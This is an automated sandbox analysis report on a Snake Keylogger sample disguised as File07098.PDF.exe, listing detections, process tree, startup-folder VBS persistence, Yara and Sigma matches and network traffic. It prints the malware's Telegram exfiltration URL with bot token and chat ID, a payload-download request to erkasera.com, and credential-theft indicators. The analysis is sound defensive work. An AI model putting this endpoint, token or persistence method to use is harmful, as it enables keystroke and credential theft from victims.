Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
File07098.PDF.exe

Overview

General Information

Sample name:File07098.PDF.exe
Analysis ID:1545174
MD5:71360d65665d164b175a5a73964e96ec
SHA1:4183950b0a17b9be22e05088ea666ebb45815a13
SHA256:f7679e885a80f2a9cfd8424891477ed8c77b4be6cf05bfc85d6d9dd87e095730
Tags:exeuser-abuse_ch
Infos:

Detection

Snake Keylogger
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Drops script at startup location
Sigma detected: Suspicious Double Extension File Execution
Yara detected AntiVM3
Yara detected Snake Keylogger
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
AI detected suspicious sample
Drops VBS files to the startup folder
Initial sample is a PE file and has a suspicious name
Machine Learning detection for dropped file
Machine Learning detection for sample
Sigma detected: WScript or CScript Dropper
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect the country of the analysis system (by using the IP)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses an obfuscated file name to hide its real file extension (double extension)
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Yara detected Costura Assembly Loader
Yara detected Generic Downloader
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Stores files to the Windows start menu directory
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer
Yara signature match

Classification

Process Tree

  • System is w10x64
  • File07098.PDF.exe (PID: 4124 cmdline: "C:\Users\user\Desktop\File07098.PDF.exe" MD5: 71360D65665D164B175A5A73964E96EC)
    • InstallUtil.exe (PID: 2460 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe" MD5: 5D4073B2EB6D217C19F2B22F21BF8D57)
  • wscript.exe (PID: 3176 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Current.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • Current.exe (PID: 528 cmdline: "C:\Users\user\AppData\Roaming\Current.exe" MD5: 71360D65665D164B175A5A73964E96EC)
      • InstallUtil.exe (PID: 6204 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe" MD5: 5D4073B2EB6D217C19F2B22F21BF8D57)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
404 Keylogger, Snake KeyloggerSnake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger

Malware Configuration

Threatname: Snake Keylogger

{"Exfil Mode": "Telegram", "Telegram URL": "https://api.telegram.org/bot7222429178:AAGkhVRfHIJkgzEwYivp9qfnKAhLB0iELTo/sendMessage?chat_id=6008123474", "Token": "7222429178:AAGkhVRfHIJkgzEwYivp9qfnKAhLB0iELTo", "Chat_id": "6008123474", "Version": "5.1"}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000006.00000002.4483465030.0000000002639000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_SnakeKeyloggerYara detected Snake KeyloggerJoe Security
    00000005.00000002.2265233058.0000000002F33000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
      00000005.00000002.2265233058.0000000002F33000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_SnakeKeyloggerYara detected Snake KeyloggerJoe Security
        00000005.00000002.2265233058.0000000002F33000.00000004.00000800.00020000.00000000.sdmpMALWARE_Win_SnakeKeyloggerDetects Snake KeyloggerditekSHen
        • 0x19c14:$x1: $%SMTPDV$
        • 0x19bbc:$x3: %FTPDV$
        • 0x19be0:$m2: Clipboard Logs ID
        • 0x19e1e:$m2: Screenshot Logs ID
        • 0x19f2e:$m2: keystroke Logs ID
        • 0x1a208:$m3: SnakePW
        • 0x19df6:$m4: \SnakeKeylogger\
        00000000.00000002.2078600685.0000000002834000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          Click to see the 46 entries

          Unpacked PEs

          SourceRuleDescriptionAuthorStrings
          0.2.File07098.PDF.exe.5fc0000.9.raw.unpackJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
            0.2.File07098.PDF.exe.33f9170.2.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
              0.2.File07098.PDF.exe.33f9170.2.unpackJoeSecurity_SnakeKeyloggerYara detected Snake KeyloggerJoe Security
                0.2.File07098.PDF.exe.33f9170.2.unpackWindows_Trojan_SnakeKeylogger_af3faa65unknownunknown
                • 0x12c67:$a1: get_encryptedPassword
                • 0x12f53:$a2: get_encryptedUsername
                • 0x12a73:$a3: get_timePasswordChanged
                • 0x12b6e:$a4: get_passwordField
                • 0x12c7d:$a5: set_encryptedPassword
                • 0x142fe:$a7: get_logins
                • 0x14261:$a10: KeyLoggerEventArgs
                • 0x13ecc:$a11: KeyLoggerEventArgsEventHandler
                0.2.File07098.PDF.exe.33f9170.2.unpackMAL_Envrial_Jan18_1Detects Encrial credential stealer malwareFlorian Roth
                • 0x1a64a:$a2: \Comodo\Dragon\User Data\Default\Login Data
                • 0x1987c:$a3: \Google\Chrome\User Data\Default\Login Data
                • 0x19caf:$a4: \Orbitum\User Data\Default\Login Data
                • 0x1acee:$a5: \Kometa\User Data\Default\Login Data
                Click to see the 36 entries

                Sigma Signatures

                System Summary

                barindex
                Sigma detected: Suspicious Double Extension File Execution
                Source: Process startedAuthor: Florian Roth (Nextron Systems), @blu3_team (idea), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Users\user\Desktop\File07098.PDF.exe", CommandLine: "C:\Users\user\Desktop\File07098.PDF.exe", CommandLine|base64offset|contains: , Image: C:\Users\user\Desktop\File07098.PDF.exe, NewProcessName: C:\Users\user\Desktop\File07098.PDF.exe, OriginalFileName: C:\Users\user\Desktop\File07098.PDF.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: "C:\Users\user\Desktop\File07098.PDF.exe", ProcessId: 4124, ProcessName: File07098.PDF.exe
                Sigma detected: WScript or CScript Dropper
                Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Current.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Current.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Current.vbs" , ProcessId: 3176, ProcessName: wscript.exe
                Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
                Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Current.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Current.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Current.vbs" , ProcessId: 3176, ProcessName: wscript.exe

                Data Obfuscation

                barindex
                Sigma detected: Drops script at startup location
                Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Users\user\Desktop\File07098.PDF.exe, ProcessId: 4124, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Current.vbs

                Suricata Signatures

                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-10-30T07:57:39.186966+010028033053Unknown Traffic192.168.2.549707188.114.96.3443TCP
                2024-10-30T07:57:43.541237+010028033053Unknown Traffic192.168.2.549713188.114.96.3443TCP
                2024-10-30T07:57:57.641366+010028033053Unknown Traffic192.168.2.549765188.114.96.3443TCP
                2024-10-30T07:58:00.538612+010028033053Unknown Traffic192.168.2.549785188.114.96.3443TCP
                2024-10-30T07:58:03.651769+010028033053Unknown Traffic192.168.2.549804188.114.96.3443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-10-30T07:57:37.356642+010028032742Potentially Bad Traffic192.168.2.549705193.122.130.080TCP
                2024-10-30T07:57:38.466060+010028032742Potentially Bad Traffic192.168.2.549705193.122.130.080TCP
                2024-10-30T07:57:39.903580+010028032742Potentially Bad Traffic192.168.2.549708193.122.130.080TCP
                2024-10-30T07:57:55.747290+010028032742Potentially Bad Traffic192.168.2.549750193.122.130.080TCP
                2024-10-30T07:57:56.950406+010028032742Potentially Bad Traffic192.168.2.549750193.122.130.080TCP
                2024-10-30T07:57:58.356676+010028032742Potentially Bad Traffic192.168.2.549767193.122.130.080TCP

                Joe Sandbox Signatures

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Antivirus / Scanner detection for submitted sample
                Source: File07098.PDF.exeAvira: detected
                Antivirus detection for dropped file
                Source: C:\Users\user\AppData\Roaming\Current.exeAvira: detection malicious, Label: HEUR/AGEN.1323701
                Found malware configuration
                Source: 00000005.00000002.2285828812.0000000003AE1000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: Snake Keylogger {"Exfil Mode": "Telegram", "Telegram URL": "https://api.telegram.org/bot7222429178:AAGkhVRfHIJkgzEwYivp9qfnKAhLB0iELTo/sendMessage?chat_id=6008123474", "Token": "7222429178:AAGkhVRfHIJkgzEwYivp9qfnKAhLB0iELTo", "Chat_id": "6008123474", "Version": "5.1"}
                Multi AV Scanner detection for dropped file
                Source: C:\Users\user\AppData\Roaming\Current.exeReversingLabs: Detection: 63%
                Multi AV Scanner detection for submitted file
                Source: File07098.PDF.exeReversingLabs: Detection: 63%
                AI detected suspicious sample
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Machine Learning detection for dropped file
                Source: C:\Users\user\AppData\Roaming\Current.exeJoe Sandbox ML: detected
                Machine Learning detection for sample
                Source: File07098.PDF.exeJoe Sandbox ML: detected

                Location Tracking

                barindex
                Tries to detect the country of the analysis system (by using the IP)
                Source: unknownDNS query: name: reallyfreegeoip.org
                Source: File07098.PDF.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49706 version: TLS 1.0
                Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49756 version: TLS 1.0
                Source: unknownHTTPS traffic detected: 188.132.193.46:443 -> 192.168.2.5:49704 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 188.132.193.46:443 -> 192.168.2.5:49724 version: TLS 1.2
                Source: File07098.PDF.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: File07098.PDF.exe, 00000000.00000002.2098203958.0000000006230000.00000004.08000000.00040000.00000000.sdmp, File07098.PDF.exe, 00000000.00000002.2078600685.000000000279E000.00000004.00000800.00020000.00000000.sdmp, File07098.PDF.exe, 00000000.00000002.2089546543.00000000035B1000.00000004.00000800.00020000.00000000.sdmp, Current.exe, 00000005.00000002.2265233058.0000000002EA9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: File07098.PDF.exe, 00000000.00000002.2098203958.0000000006230000.00000004.08000000.00040000.00000000.sdmp, File07098.PDF.exe, 00000000.00000002.2078600685.000000000279E000.00000004.00000800.00020000.00000000.sdmp, File07098.PDF.exe, 00000000.00000002.2089546543.00000000035B1000.00000004.00000800.00020000.00000000.sdmp, Current.exe, 00000005.00000002.2265233058.0000000002EA9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: protobuf-net.pdbSHA256}Lq source: File07098.PDF.exe, 00000000.00000002.2091778778.0000000004D30000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: protobuf-net.pdb source: File07098.PDF.exe, 00000000.00000002.2091778778.0000000004D30000.00000004.08000000.00040000.00000000.sdmp
                Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Jump to behavior
                Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Jump to behavior
                Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Jump to behavior
                Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\Jump to behavior
                Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Jump to behavior
                Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 0127F206h2_2_0127F017
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 0127FB90h2_2_0127F017
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h2_2_0127E538
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h2_2_0127EB6B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h2_2_0127ED4C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 06618945h2_2_06618608
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 06615D19h2_2_06615A70
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 066158C1h2_2_06615618
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 06616171h2_2_06615EC8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 06616A21h2_2_06616778
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 066165C9h2_2_06616320
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 06616E79h2_2_06616BD0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then lea esp, dword ptr [ebp-04h]2_2_066133A8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then lea esp, dword ptr [ebp-04h]2_2_066133B8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 066102E9h2_2_06610040
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 066172FAh2_2_06617050
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 06610B99h2_2_066108F0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 06617751h2_2_066174A8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 06610741h2_2_06610498
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 06610FF1h2_2_06610D48
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 06618001h2_2_06617D58
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 06617BA9h2_2_06617900
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 06618459h2_2_066181B0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 06615441h2_2_06615198
                Source: C:\Users\user\AppData\Roaming\Current.exeCode function: 4x nop then jmp 058404F7h5_2_058405B0
                Source: C:\Users\user\AppData\Roaming\Current.exeCode function: 4x nop then jmp 058404F7h5_2_05840288
                Source: C:\Users\user\AppData\Roaming\Current.exeCode function: 4x nop then jmp 058404F7h5_2_05840298
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 00AAF1F6h6_2_00AAF007
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 00AAFB80h6_2_00AAF007
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h6_2_00AAE528
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 05F5DA51h6_2_05F5D7A8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 05F51A38h6_2_05F51620
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 05F51471h6_2_05F511C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 05F502F1h6_2_05F50040
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 05F5C041h6_2_05F5BD98
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 05F51011h6_2_05F50D60
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 05F5F009h6_2_05F5ED60
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 05F5B791h6_2_05F5B4E8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 05F5E759h6_2_05F5E4B0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 05F50751h6_2_05F504A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 05F5DEA9h6_2_05F5DC00
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 05F5D1A1h6_2_05F5CEF8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 05F5C8F1h6_2_05F5C648
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 05F5F8B9h6_2_05F5F610
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 05F51A38h6_2_05F51610
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 05F5C499h6_2_05F5C1F0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 05F5F461h6_2_05F5F1B8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 05F51A38h6_2_05F51966
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 05F5BBE9h6_2_05F5B940
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 05F50BB1h6_2_05F50900
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 05F5EBB1h6_2_05F5E908
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 05F5E301h6_2_05F5E058
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 05F5D5F9h6_2_05F5D350
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 05F5CD49h6_2_05F5CAA0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 05F5FD11h6_2_05F5FA68
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 05F87BA9h6_2_05F87900
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 05F88945h6_2_05F88608
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 05F88459h6_2_05F881B0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 05F85441h6_2_05F85198
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 05F88001h6_2_05F87D58
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 05F80FF1h6_2_05F80D48
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 05F80B99h6_2_05F808F0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 05F87751h6_2_05F874A8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 05F80741h6_2_05F80498
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 05F872FAh6_2_05F87050
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 05F802E9h6_2_05F80040
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 05F86E79h6_2_05F86BD0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then lea esp, dword ptr [ebp-04h]6_2_05F833B8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then lea esp, dword ptr [ebp-04h]6_2_05F833A8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 05F86A21h6_2_05F86778
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 05F865C9h6_2_05F86320
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 05F86171h6_2_05F85EC8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then lea esp, dword ptr [ebp-04h]6_2_05F836CE
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 05F85D19h6_2_05F85A70
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 05F858C1h6_2_05F85618

                Networking

                barindex
                Yara detected Generic Downloader
                Source: Yara matchFile source: 5.2.Current.exe.3ae9550.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.File07098.PDF.exe.33f9170.2.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.File07098.PDF.exe.33d9550.1.raw.unpack, type: UNPACKEDPE
                Source: global trafficHTTP traffic detected: GET /seuias/Mccudidikm.vdf HTTP/1.1Host: erkasera.comConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/173.254.250.78 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/173.254.250.78 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /xml/173.254.250.78 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/173.254.250.78 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/173.254.250.78 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /xml/173.254.250.78 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/173.254.250.78 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/173.254.250.78 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /seuias/Mccudidikm.vdf HTTP/1.1Host: erkasera.comConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/173.254.250.78 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/173.254.250.78 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /xml/173.254.250.78 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/173.254.250.78 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /xml/173.254.250.78 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/173.254.250.78 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /xml/173.254.250.78 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/173.254.250.78 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: Joe Sandbox ViewIP Address: 188.132.193.46 188.132.193.46
                Source: Joe Sandbox ViewIP Address: 188.114.96.3 188.114.96.3
                Source: Joe Sandbox ViewIP Address: 188.114.96.3 188.114.96.3
                Source: Joe Sandbox ViewIP Address: 193.122.130.0 193.122.130.0
                Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
                Source: Joe Sandbox ViewJA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
                Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                Source: unknownDNS query: name: checkip.dyndns.org
                Source: unknownDNS query: name: reallyfreegeoip.org
                Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49705 -> 193.122.130.0:80
                Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49708 -> 193.122.130.0:80
                Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49767 -> 193.122.130.0:80
